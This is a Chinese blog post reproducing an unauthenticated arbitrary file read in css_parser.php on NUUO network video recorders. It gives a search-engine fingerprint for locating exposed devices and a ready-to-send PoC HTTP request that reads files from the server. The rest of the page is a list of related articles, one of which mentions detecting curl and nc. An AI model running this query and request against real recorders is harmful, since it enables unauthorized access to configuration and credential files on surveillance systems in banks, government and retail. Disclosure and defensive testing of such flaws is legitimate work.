【漏洞复现】NUUO网络视频录像机 css_parser.php 任意文件读取

于 2024-09-13 21:53:32 发布
阅读量299 收藏 1
点赞数 8
分类专栏: 漏洞复现 文章标签: 开发语言 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/142224481
版权

        NUUO网络视频录像机(Network Video Recorder,简称NVR)是NUUO Inc.生产的一种专业视频监控设备,它广泛应用于零售、交通、教育、政府和银行等多个领域。能够同时管理多个IP摄像头,实现视频录制、存储、回放及远程监控等功能。它采用先进的视频处理技术,提供高清、流畅的视频画面,满足各种复杂环境下的监控需求。

》》》漏洞描述《《《

        NUUO网络视频录像机 css_parser.php 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

》》》资产收集《《《

body="www.nuuo.com/eHelpdesk.php"

》》》漏洞复现《《《

》》》测试工具《《《

POC

GET /css_parser.php?css=css_parser.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20200101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

A 八方
关注
专栏目录
嵌入式鸿蒙系统开发语言开发方法分析
嵌入式技术开发
09-10 993
可复用的UI单元,可组合其它组件,如上述被@Component装饰的struct Hello。UI描述:声明式的方法来描述UI的结构,例如build()方法中的代码块。
信息安全_数据安全_Red_Team_View:Gaps_in_the_Server.pdf
08-22
例如,过去两年中,针对VMWare、Sonicwall、Veritas、ManageEngine、EMC、NUUO、Avaya等软件的零日漏洞公告,攻击者往往利用设备的API滥用进行攻击。文档强调了理解细节的重要性,因为即使部分安全控制措施足够好,...
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1201
本文主要介绍网络安全认识与学习规划
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1834
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
零信任安全:重新思考数字世界的访问
网络研究观
09-09 821
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
【Authing身份云-注册安全分析报告-无验证方式导致安全隐患】
09-09 808
Authing身份云隶属于北京蒸汽记忆科技有限公司, 是专业的员工身份管理和用户身份管理服务提供商,为企业和开发者提供快速、安全的身份认证和访问管理方案。基于员工和用户身份管理,Authing 推出了单点登录、自适应多因素认证、手机号码闪验、应用集成网关、权限管理、通用登录组件、自定义数据库连接等产品。作为身份验证的厂家,好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
个人信息记录安全:守护数字时代的隐私堡垒
大厂全栈码农
09-09 1475
同时,也强调了个人在保护自身信息方面的意识与行为的重要性,最后对个人信息记录安全的未来发展趋势进行了展望,旨在为构建更安全的个人信息环境提供全面且深入的思考。此外,在移动互联网时代,个人信息还存在于各种移动应用程序中,从社交软件、购物应用到金融理财 APP 等,这些应用在为用户提供便捷服务的同时,也收集和存储了大量的个人信息。例如,一些电商平台在用户浏览商品时,收集了大量与购物无关的个人信息,如地理位置、设备信息等,并将这些信息用于精准营销,甚至在用户不知情的情况下将信息共享给其他第三方公司。
GORM安全-保护你的应用免受SQL注入攻击
最新发布
一起coding,一起嗨。
09-12 458
GORM安全-保护你的应用免受SQL注入攻击
亚信安全出席第五届国际反病毒大会 探究AI现代网络勒索治理
亚信安全官方账号的博客
09-09 498
亚信安全出席活动并发表题为《AI时代下现代网络勒索治理》的演讲
剖析Cookie的工作原理及其安全风险
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-06 1325
Cookie,也称为HTTP cookie、web cookie、互联网cookie或浏览器cookie,是一种用于在用户浏览网站时识别用户并为其准备网页的小型数据片段。它允许Web服务器跟踪用户的浏览历史并响应之前披露的偏好。可以增强用户体验,并基于过去的行为启用个性化内容。Cookie通常以键值对的形式存储在用户的硬盘上,是一个二进制的Sqlite文件,Windows系统中Chrome浏览器的Cookie默认位置一般为。Cookie有多种类型,包括会话cookie和持久cookie。
守护应用边界:通过反射API实现安全的输入输出过滤
apixixi的博客
09-09 488
首先,你需要定义哪些类、方法或字段是安全的,可以通过反射访问。这可以通过白名单机制来实现,即只有在白名单中的类或方法才允许被访问。java复制代码static {> clazz) {通过使用白名单和输入验证,你可以在Java中使用反射API时提高应用的安全性。然而,过度依赖反射可能会降低代码的可读性和性能,因此请慎重考虑是否需要在你的应用中使用反射。
网络安全应急响应技术原理与应用
weixin_49171105的博客
09-06 538
概念为应对网络安全事件,相关人员或组织机构对网络安全事件进行监测、预警、分析、响应和恢复等工作。
TRIZ在充电桩安全中的应用探究
tianxingjian713的博客
09-06 648
通过运用TRIZ的工具和原则,可以有效地解决充电桩在电气、机械、环境和网络等方面的安全问题,提高充电桩的可靠性和安全性,为电动汽车的普及和发展提供有力保障。在当今电动汽车日益普及的时代,充电桩的安全问题至关重要。-运用TRIZ的物场分析方法,优化充电插头和插座的设计,提高插拔的可靠性和稳定性,减少机械故障的发生。-利用TRIZ的动态化原理,设计可调节的充电桩结构,使其能够适应不同的天气条件,如防风、防雨、防晒等。2.机械安全风险:如充电桩外壳的坚固程度、充电插头的插拔可靠性等,可能影响用户的使用安全
客户案例:安全海外中继助力知名家电企业化解海外通邮困境
CACTER_S的博客
09-09 535
安全海外中继获客户满分好评!
加密与安全_ sm-crypto 国密算法sm2、sm3和sm4的Java库
小工匠
09-05 885
国密算法sm2、sm3和sm4的java版。基于js版本进行封装,无缝兼容js版公私钥加解密。ps:理论上来说,只做纯签名是最快的。如果需要使用已发布的版本,在。
Dubbo 安全方面措施
Flying_Fish_roe的博客
09-06 1358
在分布式系统中,安全性是一个至关重要的因素,特别是对于像 Dubbo 这样的高性能 RPC 框架,确保服务的安全性和数据传输的完整性至关重要。Dubbo 作为一个成熟的分布式服务框架,在安全性方面提供了多种措施和配置选项,帮助开发者保护服务的安全性和数据的完整性。
SenseGlove机器臂遥操作控制:技术优势与高危作业安全保障
2301_81438894的博客
09-06 589
该系统由多个关键组件构成,包括1个或多个由人手控制的机器人手臂、SenseGlove力反馈手套、虚拟现实头显、装备有精密工具的机器人手臂(如蟹爪和带有四只手指的机械臂)以及一个策略性放置的摄像机。这种逼真的触觉反馈不仅提高了操作的精确性,还显著增强了操作员对环境的感知能力,降低了误操作的风险。高精度的力反馈技术:SenseGlove机器臂遥操作解决方案的核心在于其使用了先进的SenseGlove力反馈手套,该手套能够模拟出机械臂末端握持物体的真实触感,包括力度、纹理、刚性等细微差异。
安全产品概述
好记性不如烂笔头
09-09 1160
IOA并不关注他开的是什么车,用了什么工具,IOA关注的是这一系列的操作:破解密码、进入金库等,记录盗贼抢银行的关键行为。IOA的概念是主动的,去发现正在进行的攻击,来减轻最终的后果。举例来说,如果攻击应用系统(如apache、nginx、php-cgi等)、数据库(mysql、oracle、postgres、sqlserver、redis等)、语言进程(java、python),在这些应用场景下如果起了进程,执行了curl、ifconfig、nc、ping等危险操作,就可能会被记录下来。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值